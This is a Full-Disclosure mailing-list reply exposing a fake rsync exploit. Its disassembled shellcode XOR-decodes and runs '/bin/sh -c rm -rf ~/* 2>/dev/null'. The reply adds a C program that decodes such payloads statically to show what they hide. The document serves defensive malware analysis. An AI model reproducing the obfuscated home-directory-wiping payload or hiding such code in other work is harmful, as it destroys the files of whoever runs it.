
Re: [Full-Disclosure] new rsync :) exploit rsync-too-open



dkey wrote:

"nice mail"...but if somebody wants to use it, check the shellcode first...I think it deletes all your files in your home dir. I'm not sure, maybe somebody else can check it...

Yes.


seg000:00000000 ; Segment type: Pure code
seg000:00000000 seg000 segment byte public 'CODE' use32
seg000:00000000 assume cs:seg000
seg000:00000000 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
seg000:00000000 jmp short loc_12
seg000:00000002
seg000:00000002 ; =============== S U B R O U T I N E =======================================
seg000:00000002
seg000:00000002
seg000:00000002 sub_2 proc near ; CODE XREF: sub_2+10p
seg000:00000002 pop esi ; ESI = addr of decode section (17h, pushed by the call at 12h)
seg000:00000003 xor ecx, ecx ; ECX = 0
seg000:00000005 mov cl, 75 ; loop 75 times = 4Bh bytes, offsets 17h..61h
seg000:00000007 mov al, 255 ; XOR key starts at 0FFh and drops by one per byte
seg000:00000009
seg000:00000009 decode_loop: ; CODE XREF: sub_2+Cj
seg000:00000009 xor [esi], al ; XOR current byte in decode section with AL
seg000:0000000B dec al ; AL = AL - 1
seg000:0000000D inc esi ; next byte
seg000:0000000E loop decode_loop
seg000:00000010 jmp short decoded
seg000:00000012 ; ---------------------------------------------------------------------------
seg000:00000012
seg000:00000012 loc_12: ; CODE XREF: seg000:00000000j
seg000:00000012 call sub_2 ; push addr of decode section
seg000:00000017
seg000:00000017 decoded: ; CODE XREF: sub_2+Ej
seg000:00000017 call loc_41 ; push addr of "/bin/sh" (1Ch)
seg000:00000017 ; ---------------------------------------------------------------------------
seg000:0000001C aBinSh db '/bin/sh',0
seg000:00000024 aSh db 'sh',0
seg000:00000027 aC db '-c',0
seg000:0000002A aRmRf2DevNull db 'rm -rf ~/* 2>/dev/null',0
seg000:00000041 ; ---------------------------------------------------------------------------
seg000:00000041
seg000:00000041 loc_41: ; CODE XREF: sub_2+15p
seg000:00000041 pop ebp ; EBP = addr of "/bin/sh" (pushed by the call at 17h)
seg000:00000042 xor eax, eax ; EAX = 0
seg000:00000042 sub_2 endp
seg000:00000042
seg000:00000044 push eax ; argv[3] = NULL (array terminator)
seg000:00000045 lea ebx, [ebp+0Eh]
seg000:00000048 push ebx ; argv[2] = "rm -rf ~/* 2>/dev/null"
seg000:00000049 lea ebx, [ebp+0Bh]
seg000:0000004C push ebx ; argv[1] = "-c"
seg000:0000004D lea ebx, [ebp+8]
seg000:00000050 push ebx ; argv[0] = "sh"
seg000:00000051 mov ebx, ebp ; filename = "/bin/sh"
seg000:00000053 mov ecx, esp ; ECX = argv (the array just pushed)
seg000:00000055 xor edx, edx ; EDX = 0, envp = NULL
seg000:00000057 mov al, 0Bh ; syscall 11
seg000:00000059 int 80h ; LINUX - sys_execve
seg000:0000005B mov ebx, eax ; only reached if execve failed: EBX = its return value (exit status)
seg000:0000005D xor eax, eax
seg000:0000005F inc eax ; syscall 1
seg000:00000060 int 80h ; LINUX - sys_exit
seg000:00000060 seg000 ends
seg000:00000060 end


AKA "/bin/sh -c rm -rf ~/* 2>/dev/null"

BB
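
The decode stub above is the reason a quick `strings` over the raw exploit shows no `rm -rf`: the 75 bytes after the `call sub_2` are XORed with a key that starts at 0FFh and decreases by one per byte, so nothing readable exists until the stub has run. The safe way to check shellcode like this is to apply the same transform statically and look at the result, never to execute it. The program below is an added example, not code from BB's or dkey's mail and not the exploit itself: it reproduces `decode_loop` in C, feeds it a plaintext hand-assembled from the listing (the opcode encodings are this example's own choice and may not match the bytes the exploit carries; the strings are the ones in the listing), and shows that the encoded form hides the strings while the decoded form yields the four `execve` arguments and the `mov al, 0Bh; int 80h` syscall.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define DECODE_LEN 75    /* mov cl, 75 in the stub */
#define DECODE_KEY 0xFF  /* mov al, 255: byte i is XORed with 0xFF - i */

/* Plaintext of the region the stub decodes (listing offsets 17h..61h),
 * hand-assembled here from the listing's mnemonics. Constructed for this
 * example; the encodings chosen may differ from the circulated exploit. */
static const uint8_t decoded_ref[DECODE_LEN] = {
    0xE8, 0x25, 0x00, 0x00, 0x00,                    /* call loc_41 */
    '/', 'b', 'i', 'n', '/', 's', 'h', 0,            /* "/bin/sh" */
    's', 'h', 0,                                     /* "sh" */
    '-', 'c', 0,                                     /* "-c" */
    'r', 'm', ' ', '-', 'r', 'f', ' ', '~', '/', '*', ' ',
    '2', '>', '/', 'd', 'e', 'v', '/', 'n', 'u', 'l', 'l', 0,
    0x5D,                                            /* pop ebp */
    0x31, 0xC0,                                      /* xor eax, eax */
    0x50,                                            /* push eax */
    0x8D, 0x5D, 0x0E, 0x53,                          /* lea ebx,[ebp+0Eh]; push ebx */
    0x8D, 0x5D, 0x0B, 0x53,                          /* lea ebx,[ebp+0Bh]; push ebx */
    0x8D, 0x5D, 0x08, 0x53,                          /* lea ebx,[ebp+8]; push ebx */
    0x89, 0xEB,                                      /* mov ebx, ebp */
    0x89, 0xE1,                                      /* mov ecx, esp */
    0x31, 0xD2,                                      /* xor edx, edx */
    0xB0, 0x0B, 0xCD, 0x80,                          /* mov al, 0Bh; int 80h */
    0x89, 0xC3,                                      /* mov ebx, eax */
    0x31, 0xC0, 0x40, 0xCD, 0x80                     /* xor eax,eax; inc eax; int 80h */
};

/* Same transform as the stub's decode_loop. XOR is its own inverse, so the
 * function both encodes the plaintext and decodes the encoded form. */
void xor_stub(uint8_t *buf, size_t n)
{
    uint8_t key = DECODE_KEY;
    for (size_t i = 0; i < n; i++) {
        buf[i] ^= key;   /* xor [esi], al */
        key--;           /* dec al */
    }
}

/* Portable substitute for memmem: does buf contain the byte string pat? */
int contains(const uint8_t *buf, size_t n, const void *pat, size_t m)
{
    if (m == 0 || m > n) return 0;
    for (size_t i = 0; i + m <= n; i++)
        if (memcmp(buf + i, pat, m) == 0) return 1;
    return 0;
}

/* Collect runs of at least min_len printable bytes that end in a NUL,
 * i.e. the strings(1) heuristic applied to an in-memory buffer. */
size_t extract_strings(const uint8_t *buf, size_t n, size_t min_len,
                       char out[][64], size_t max_out)
{
    size_t found = 0, start = 0, run = 0;
    for (size_t i = 0; i < n; i++) {
        uint8_t c = buf[i];
        if (c >= 0x20 && c <= 0x7E) {
            if (run == 0) start = i;
            run++;
        } else {
            if (c == 0 && run >= min_len && run < 64 && found < max_out) {
                memcpy(out[found], buf + start, run);
                out[found][run] = '\0';
                found++;
            }
            run = 0;   /* any other non-printable byte breaks the run */
        }
    }
    return found;
}

static char found_strings[8][64];
static uint8_t encoded[DECODE_LEN];   /* what the exploit would actually carry */
static int encoded_built = 0;

static void build_encoded(void)
{
    if (encoded_built) return;
    memcpy(encoded, decoded_ref, DECODE_LEN);
    xor_stub(encoded, DECODE_LEN);
    encoded_built = 1;
}

/* Encode, then decode statically (nothing is executed) and pull the strings.
 * Returns the number of strings found, 0 if the round trip did not match. */
size_t demo_pipeline(void)
{
    uint8_t work[DECODE_LEN];
    build_encoded();
    memcpy(work, encoded, DECODE_LEN);
    xor_stub(work, DECODE_LEN);
    if (memcmp(work, decoded_ref, DECODE_LEN) != 0) return 0;
    return extract_strings(work, DECODE_LEN, 2, found_strings, 8);
}

const char *demo_string(size_t i) { return i < 8 ? found_strings[i] : ""; }

/* 1 if the encoded blob does NOT contain s, i.e. the stub hides it. */
int encoded_hides(const char *s)
{
    build_encoded();
    return !contains(encoded, DECODE_LEN, s, strlen(s));
}

/* 1 if the decoded payload contains mov al,0Bh; int 80h (sys_execve). */
int payload_calls_execve(void)
{
    static const uint8_t sig[] = { 0xB0, 0x0B, 0xCD, 0x80 };
    return contains(decoded_ref, DECODE_LEN, sig, sizeof sig);
}

int main(void)
{
    size_t n = demo_pipeline();
    printf("encoded blob hides \"/bin/sh\": %s\n", encoded_hides("/bin/sh") ? "yes" : "no");
    printf("after static decode, %zu strings:\n", n);
    for (size_t i = 0; i < n; i++) printf("  %s\n", found_strings[i]);
    printf("decoded payload calls execve: %s\n", payload_calls_execve() ? "yes" : "no");
    return 0;
}
```

The same approach works on the real blob: copy the 75 bytes that follow the `call` out of the exploit source into `encoded` instead of generating them, run `xor_stub` over them in a scratch buffer, and read the strings and syscall numbers from the copy. Decoding in a buffer you never jump to costs nothing; running "the new rsync exploit" to find out what its shellcode does is how a home directory gets emptied.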

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html